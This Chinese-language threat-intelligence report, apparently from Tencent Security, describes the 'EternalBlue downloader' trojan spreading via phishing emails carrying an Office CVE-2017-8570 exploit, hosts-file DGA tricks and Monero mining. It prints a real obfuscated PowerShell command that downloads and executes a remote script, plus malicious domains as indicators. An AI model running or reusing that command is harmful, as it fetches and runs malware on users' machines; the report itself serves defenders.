“永恒之蓝下载器木马”新增钓鱼邮件传播

2020-04-03 12:26:14
腾讯安全御见威胁情报中心检测到“永恒之蓝下载器木马”新增钓鱼邮件传播功能。“永恒之蓝”下载器木马在感染用户机器上运行后,会自动当前用户的邮箱通讯录并发送附件为urgent.doc的文档,该文档附带CVE-2017-8570(Office高危漏洞,又称沙虫二代)漏洞攻击代码。

近期腾讯安全御见威胁情报中心检测到“永恒之蓝下载器木马”新增钓鱼邮件传播功能。“永恒之蓝”下载器木马在感染用户机器上运行后,会自动当前用户的邮箱通讯录并发送附件为urgent.doc的文档,该文档附带CVE-2017-8570Office高危漏洞,又称沙虫二代)漏洞攻击代码。

如果被攻击用户收到邮件并不慎打开文档,就可能触发漏洞执行Powershell命令下载mail.jsp

C:/Windows/System32/cmd.exe /c powershell IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

而下载使用的域名ap35nf7.jp实际上并没有注册,但是依然能够解析到地址:t.awcna.com,是因为被感染机器的本地hosts文件被篡改,使得随机生成的域名映射到木马使用的恶意地址,细节请参考御见威胁情报中心此前发布的报告:https://mp.weixin.qq.com/s/paTnr634YL54SBKoqWTNQg

本次攻击过程中,木马将使用随机生成的字符加“.cn”或”.jp“或”.kr“后缀作为DGA域名,并在hosts文件中指向域名:

t.tr2q.com,

t.awcna.com,

t.amynx.com


mail.jsp经过高度混淆,多次解密后可以看到其安装多个计划任务下载Powershell脚本执行,并使用了新的计划任务名:“Bluetea“蓝茶。


“永恒之蓝下载器木马自出现之后从未停止更新,从最初的PE样本攻击到后来转移为以Powershell无文件攻击方式躲避查杀,并且通过安装多个类型的计划任务进行持久化。在传播方式上,最初通过供应链攻击积累一批感染机器后,又不断利用”永恒之蓝漏洞,MSSql爆破,$IPC爆破,RDP爆破等方法进行扩散传播,近期又增加了DGA域名攻击和钓鱼邮件攻击,其最终目的只为利用用户机器挖矿门罗币获利。

永恒之蓝下载器木马的历次版本更新参考下表:


安全建议:

1.建议不要打开不明来源的邮件附件,对于邮件附件中的文件要谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描;

2.服务器使用安全的密码策略,特别是IPC$MSSQLRDP账号密码,切勿使用弱口令,避免遭遇弱密码爆破攻击;

3.
根据微软公告及时修复
Office漏洞CVE-2017-8570推荐使用腾讯御点或腾讯电脑管家进行漏洞扫描和修复(https://s.tencent.com/product/yd/index.html),或采用Windows Update进行。


IOCs

http[:]//t.awcna.com/mail.jsp

最新资讯